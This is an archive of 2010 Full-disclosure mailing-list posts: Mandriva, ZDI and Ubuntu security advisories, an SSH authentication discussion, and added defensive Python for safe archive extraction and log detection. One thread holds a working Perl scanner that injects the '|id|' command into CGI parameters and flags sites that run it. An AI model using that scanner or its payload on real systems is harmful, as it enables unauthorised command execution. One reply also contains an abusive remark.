[Full-disclosure] [ MDVSA-2010:120 ] squirrelmail
Mandriva Linux Security Advisory MDVSA-2010:120
http://www.mandriva.com/security/

Package : squirrelmail
Date: June 21, 2010
Affected: Corporate 4.0, Enterprise Server 5.0

Problem Description:

A vulnerability was reported in the SquirrelMail Mail Fetch plugin, wherein (when the plugin is activated by the administrator) a user is allowed to specify (without restriction) any port number for their external POP account settings. While the intention is to allow users to access POP3 servers using non-standard ports, this also allows malicious users to effectively port-scan any server through their SquirrelMail service (especially note that when a SquirrelMail server resides on a network behind a firewall, it may allow the user to explore the network topography (DNS scan) and services available (port scan) on the inside of (behind) that firewall). As this vulnerability is only exploitable post-authentication, and better more specific port scanning tools are freely available, we consider this vulnerability to be of very low severity. It has been fixed by restricting the allowable POP port numbers (with an administrator configuration override available) (CVE-2010-1637).

The updated packages have been patched to correct this issue.
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637
http://www.squirrelmail.org/security/issue/2010-06-21

Updated Packages:

Corporate 4.0:
[Full-disclosure] ZDI-10-111: Adobe Flash Player LocalConnection Memory Corruption Remote Code Execution Vulnerability
ZDI-10-111: Adobe Flash Player LocalConnection Memory Corruption Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-111
June 21, 2010

-- CVE ID:
CVE-2010-2188

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Flash Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9912. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the connect method exposed via the ActionScript native object number 2200. If this function is called several times with differing strings, a memory corruption issue can be triggered. This can be exploited by remote attackers to execute arbitrary code under the context of the user running the web browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-14.html

-- Disclosure Timeline:
2010-06-02 - Vulnerability reported to vendor
2010-06-21 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter: http://twitter.com/thezdi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-112: Novell Access Manager Arbitrary File Upload Remote Code Execution Vulnerability
ZDI-10-112: Novell Access Manager Arbitrary File Upload Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-112
June 21, 2010

-- CVE ID:
CVE-2010-0284

-- Affected Vendors:
Novell

-- Affected Products:
Novell Access Manager

-- Vulnerability Details:
This vulnerability allows remote attackers to upload arbitrary files on vulnerable installations of Novell Access Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the PortalModuleInstallManager component of the Novell Management Console which exists within the servlet located within nps.jar. Due to a failure to sanitize '../' directory traversal modifiers from a parameter an attacker can specify any filename to upload arbitrary contents into. Successful exploitation can result in code execution under the context of the service.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/php/search.do?cmd=displayKC&docType=kc&externalId=7006255&sliceId=1&docTypeID=DT_TID_1_1&dialogID=149517296&stateId=0%200%20149513677

-- Disclosure Timeline:
2009-12-10 - Vulnerability reported to vendor
2010-06-21 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)
[Full-disclosure] [USN-952-1] CUPS vulnerabilities
===========================================================
Ubuntu Security Notice USN-952-1              June 21, 2010
cups, cupsys vulnerabilities
CVE-2010-0540, CVE-2010-0542, CVE-2010-1748
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  cupsys 1.2.2-0ubuntu0.6.06.19

Ubuntu 8.04 LTS:
  cupsys 1.3.7-1ubuntu3.11

Ubuntu 9.04:
  cups 1.3.9-17ubuntu3.9

Ubuntu 9.10:
  cups 1.4.1-5ubuntu2.6

Ubuntu 10.04 LTS:
  cups 1.4.3-1ubuntu1.2

In general, a standard system update will make all the necessary changes.

Details follow:

Adrian Pastor and Tim Starling discovered that the CUPS web interface incorrectly protected against cross-site request forgery (CSRF) attacks. If an authenticated user were tricked into visiting a malicious website while logged into CUPS, a remote attacker could modify the CUPS configuration and possibly steal confidential data. (CVE-2010-0540)

It was discovered that CUPS did not properly handle memory allocations in the texttops filter. If a user or automated system were tricked into printing a crafted text file, a remote attacker could cause a denial of service or possibly execute arbitrary code with privileges of the CUPS user (lp). (CVE-2010-0542)

Luca Carettoni discovered that the CUPS web interface incorrectly handled form variables. A remote attacker who had access to the CUPS web interface could use this flaw to read a limited amount of memory from the cupsd process and possibly obtain confidential data.
(CVE-2010-1748)

Updated packages for Ubuntu 6.06 LTS:
[Full-disclosure] [USN-953-1] fastjar vulnerability
===========================================================
Ubuntu Security Notice USN-953-1              June 21, 2010
fastjar vulnerability
CVE-2010-0831
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 8.04 LTS:
  fastjar 2:0.95-1ubuntu2.1

Ubuntu 9.04:
  fastjar 2:0.97-3ubuntu0.1

Ubuntu 9.10:
  fastjar 2:0.98-1ubuntu0.9.10.1

Ubuntu 10.04 LTS:
  fastjar 2:0.98-1ubuntu0.10.04.1

In general, a standard system update will make all the necessary changes.

Details follow:

Dan Rosenberg discovered that fastjar incorrectly handled file paths containing .. when unpacking archives. If a user or an automated system were tricked into unpacking a specially crafted jar file, arbitrary files could be overwritten with user privileges.

Updated packages for Ubuntu 8.04 LTS:
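The ".." handling flaw in this notice, and the '../' upload flaw in ZDI-10-112 above, both come from writing to a path built from an untrusted name. The following Python code is an added example, not code from fastjar, Ubuntu or Novell: it checks every archive member name before writing and rejects names that would leave the destination directory. `resolve_member`, `safe_extract` and the sample archive are hypothetical names and constructed data.

```python
import io
import os
import tempfile
import zipfile


class UnsafeEntry(Exception):
    """Raised when a member name would be written outside the destination."""


def resolve_member(dest_dir, member_name):
    """Return the absolute path for a member, or raise UnsafeEntry."""
    # Jar/zip names use "/", but a hostile archive may also carry "\".
    parts = member_name.replace("\\", "/").split("/")
    # Absolute names ("/x") and drive-qualified names ("C:/x") are refused.
    if parts[0] == "" or (len(parts[0]) == 2 and parts[0][1] == ":"):
        raise UnsafeEntry("absolute path: %r" % member_name)
    # Conservative: any ".." component is refused, even "a/../b".
    if ".." in parts:
        raise UnsafeEntry("parent-directory component: %r" % member_name)
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, *parts))
    # Second check on the resolved path: catches symlinks that already
    # exist inside the destination and point somewhere else.
    if target == root or os.path.commonpath([root, target]) != root:
        raise UnsafeEntry("escapes destination: %r" % member_name)
    return target


def safe_extract(archive_bytes, dest_dir):
    """Extract safe members only; return (written_paths, rejected_names)."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.endswith("/"):
                continue  # directories are created on demand below
            try:
                target = resolve_member(dest_dir, info.filename)
            except UnsafeEntry:
                rejected.append(info.filename)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written, rejected


def build_sample_jar():
    """Constructed archive: two ordinary members and two unsafe names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        zf.writestr("../../outside.txt", "would land above the destination\n")
        zf.writestr("/absolute.txt", "absolute member name\n")
    return buf.getvalue()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as dest:
        written, rejected = safe_extract(build_sample_jar(), dest)
        root = os.path.realpath(dest)
        print("written :", sorted(os.path.relpath(p, root) for p in written))
        print("rejected:", rejected)
```

Rejected names are returned rather than silently skipped so the caller can log them or abort the whole extraction.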
[Full-disclosure] [USN-955-1] OPIE vulnerability
===========================================================
Ubuntu Security Notice USN-955-1              June 21, 2010
opie vulnerability
CVE-2010-1938
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 9.04:
  libopie-dev 2.40~dfsg-0ubuntu1.9.04.1

Ubuntu 9.10:
  libopie-dev 2.40~dfsg-0ubuntu1.9.10.1

Ubuntu 10.04 LTS:
  libopie-dev 2.40~dfsg-0ubuntu1.10.04.1

In general, a standard system update will make all the necessary changes.

Details follow:

Maksymilian Arciemowicz and Adam Zabrocki discovered that OPIE incorrectly handled long usernames. A remote attacker could exploit this with a crafted username and make applications linked against libopie crash, leading to a denial of service.

Updated packages for Ubuntu 9.04:
[Full-disclosure] [USN-955-2] libpam-opie vulnerability
===========================================================
Ubuntu Security Notice USN-955-2              June 21, 2010
libpam-opie vulnerability
CVE-2010-1938
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 9.04:
  libpam-opie 0.21-8build1.9.04.1

Ubuntu 9.10:
  libpam-opie 0.21-8build2.1

Ubuntu 10.04 LTS:
  libpam-opie 0.21-8build3.1

In general, a standard system update will make all the necessary changes.

Details follow:

USN-955-1 fixed vulnerabilities in OPIE. This update provides rebuilt libpam-opie packages against the updated libopie library.

Original advisory details:

Maksymilian Arciemowicz and Adam Zabrocki discovered that OPIE incorrectly handled long usernames. A remote attacker could exploit this with a crafted username and make applications linked against libopie crash, leading to a denial of service.

Updated packages for Ubuntu 9.04:
Re: [Full-disclosure] targetted SSH bruteforce attacks
On 6/17/2010 3:21 PM, Paul Schmehl wrote:
> --On Thursday, June 17, 2010 11:04:52 -0700 Xin LI delp...@gmail.com wrote:
>
>> Of course it's wise to disable password authentication and just use public key authentication.
>
> Why? Ssh is encrypted, so you're not exposing a password when you login. How does public key authentication make you more secure (in a practical sense)?

In the case of SSH password auth you are handing the plaintext password directly to any server you log in to. For many of us, this is basically any time we're expecting to contact that server for the first time from that client machine. For users who are willing to bypass a server key mismatch warning, they may be giving away their password every time.

I know there's somebody out there who always verifies server fingerprints through an independent trusted channel before accepting them. I would like to meet this person.

Often the same password is used on multiple systems (e.g. kerberos/active directory).

However, if the client is configured to only use public key auth, accidentally connecting to a malicious server does not automatically give the bad guy your plaintext password.

- Marsh
[Full-disclosure] [USN-954-1] tiff vulnerabilities
===========================================================
Ubuntu Security Notice USN-954-1              June 21, 2010
tiff vulnerabilities
CVE-2010-1411, CVE-2010-2065, CVE-2010-2067
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libtiff4 3.7.4-1ubuntu3.8

Ubuntu 8.04 LTS:
  libtiff4 3.8.2-7ubuntu3.6

Ubuntu 9.04:
  libtiff4 3.8.2-11ubuntu0.9.04.6

Ubuntu 9.10:
  libtiff4 3.8.2-13ubuntu0.3

Ubuntu 10.04 LTS:
  libtiff4 3.9.2-2ubuntu0.3

After a standard system update you need to restart your session to make all the necessary changes.

Details follow:

Kevin Finisterre discovered that the TIFF library did not correctly handle certain image structures. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a denial of service. (CVE-2010-1411)

Dan Rosenberg and Sauli Pahlman discovered multiple flaws in the TIFF library. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a denial of service. (Only Ubuntu 10.04 LTS was affected.)
(CVE-2010-2065, CVE-2010-2067)

Updated packages for Ubuntu 6.06 LTS:
Re: [Full-disclosure] (Almost) Universal perl CGI exploitation
This has a small bug. Gives false positives on some websites, silly me. Here's an updated version:

--- code ---
#!/usr/bin/perl
#oxagast
if (@ARGV[0] eq "") {
  print "---=== oxagast's buggy cgi finder ===---\n\n";
  print "Please provide a URL with a CGI script and it's args.\n";
  print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
  exit;
}
@urlquestionsplit = split(/\?/, @ARGV[0]);
$baseurl = @urlquestionsplit[0];
@inputafterquestion = split(/\&/, @urlquestionsplit[1]);
for $countargs (0..scalar(@inputafterquestion)) {
  $numofargs = $countargs;
}
for $cgiargsplitter (0..$numofargs) {
  @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
  push @cgiargsaftereq, @cgiaanda[1];
}
for $thisarg (0..$numofargs-1) {
  $wholestring = @urlquestionsplit[1];
  $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/;
  push @urltotest, "$baseurl?$wholestring";
}
for $argnumber (0..$numofargs) {
  system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh");
  system("chmod u+x getfile.sh");
  system("./getfile.sh");
  @gotstuff = `cat gettmp`;
  $done = 0;
  $exploitable;
  for $line (0..scalar(@gotstuff)-1) {
    if (@gotstuff[$line] =~ m/uid\=/) {
      if ($done == 0) {
        $done = 1;
        $firstline = $line;
        @gotstuff[$line] =~ m/.*uid(.*)\).*/;
        $uidline = "uid$1)";
        print "Exploitable...\n";
        print "@urltotest[$argnumber]\n";
        print "$uidline\n";
        unlink("gettemp");
        unlink("getfile.sh");
        $exploitable = 1;
      }
    }
  }
  system("rm gettmp getfile.sh");
}
if ($exploitable == 0) {
  print "Sorry, not exploitable...\n";
}
--- code ---

On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker marshallwhitta...@gmail.com wrote:

This works on the perl pipe bug. It'll take an arg that's the address of a website and its cgi script with some args to the script then figure out if it can exploit it and how. It's worked on everything I've tried it on, though I have limited test boxes. It's pretty dirty but it works.
#!/usr/bin/perl
#oxagast
if (@ARGV[0] eq "") {
  print "---=== oxagast's buggy cgi finder ===---\n\n";
  print "Please provide a URL with a CGI script and it's args.\n";
  print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
  exit;
}
@urlquestionsplit = split(/\?/, @ARGV[0]);
$baseurl = @urlquestionsplit[0];
@inputafterquestion = split(/\&/, @urlquestionsplit[1]);
for $countargs (0..scalar(@inputafterquestion)) {
  $numofargs = $countargs;
}
for $cgiargsplitter (0..$numofargs) {
  @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
  push @cgiargsaftereq, @cgiaanda[1];
}
for $thisarg (0..$numofargs-1) {
  $wholestring = @urlquestionsplit[1];
  $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/;
  push @urltotest, "$baseurl?$wholestring";
}
for $argnumber (0..$numofargs) {
  system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh");
  system("chmod u+x getfile.sh");
  system("./getfile.sh");
  @gotstuff = `cat gettmp`;
  $done = 0;
  $exploitable;
  for $line (0..scalar(@gotstuff)-1) {
    if (@gotstuff[$line] =~ m/uid/) {
      if ($done == 0) {
        $done = 1;
        $firstline = $line;
        @gotstuff[$line] =~ m/.*uid(.*)\).*/;
        $uidline = "uid$1)";
        print "Exploitable...\n";
        print "@urltotest[$argnumber]\n";
        print "$uidline\n";
        unlink("gettemp");
        unlink("getfile.sh");
        $exploitable = 1;
      }
    }
  }
  system("rm gettmp getfile.sh");
}
if ($exploitable == 0) {
  print "Sorry, not exploitable...\n";
}

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
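Seen from the server side, the probe in the thread above is the same CGI path requested several times, each time with a different parameter value replaced by a pipe-wrapped string. The following detection sketch is an added example, not part of the original posts; the log lines, addresses and the function names `pipe_probes` and `sweeps` are constructed for illustration, and it assumes combined-format access logs.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Jun/2010:10:00:01 +0000] "GET /cgi-bin/buggy.cgi?file_name=%7Cid%7C&click_num=0&hello=world HTTP/1.0" 200 312 "-" "Wget/1.12"
198.51.100.7 - - [21/Jun/2010:10:00:02 +0000] "GET /cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=|id|&hello=world HTTP/1.0" 200 298 "-" "Wget/1.12"
203.0.113.9 - - [21/Jun/2010:10:00:05 +0000] "GET /cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world HTTP/1.1" 200 298 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jun/2010:10:00:09 +0000] "GET /search?q=a%7Cb HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# client address and request target from one combined-format line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def pipe_probes(log_text):
    """Map (client, path) to the parameter names that carried a pipe-wrapped value."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so %7Cid%7C and |id| compare equal
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            v = value.strip()
            # A leading or trailing pipe is what a filename-as-command bug
            # reacts to; a pipe in the middle (a|b) is ordinary data.
            if len(v) > 1 and (v.startswith("|") or v.endswith("|")):
                hits[(client, url.path)].add(name)
    return {key: sorted(names) for key, names in hits.items()}


def sweeps(log_text, min_params=2):
    """Clients that tried the payload in several parameters of one script."""
    return {k: v for k, v in pipe_probes(log_text).items() if len(v) >= min_params}
```

A single pipe-wrapped value can be a false positive; the same client rotating it through several parameters of one script is the stronger signal.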
[Full-disclosure] No anti-virus software? No internet connection
Security is as easy as that..

http://www.news.com.au/technology/no-anti-virus-software-no-internet-connection/story-e6frfro0-1225882656490
Re: [Full-disclosure] No anti-virus software? No internet connection
yep, your tax $$$ at work

Don't forget their Internet filter as well.. With these rocket scientists running the show, what's there to worry about

http://blogs.news.com.au/techblog/index.php/news/comments/finally_theres_protection_against_spams_and_scams

On Tue, Jun 22, 2010 at 2:32 PM, Jubei Trippataka vpn.1.fana...@gmail.com wrote:

They had a committee working on this for a year and that's the best they could come up with? HAHAHAHA.

Belinda Neal - With idiots like you and your colleagues tackling this issue, tax payers deserve to burn you at the stake.

BTW... are you really a du0d?

-- ciao JT
Re: [Full-disclosure] No anti-virus software? No internet connection
They had a committee working on this for a year and that's the best they could come up with? HAHAHAHA.

Belinda Neal - With idiots like you and your colleagues tackling this issue, tax payers deserve to burn you at the stake.

BTW... are you really a du0d?

-- ciao JT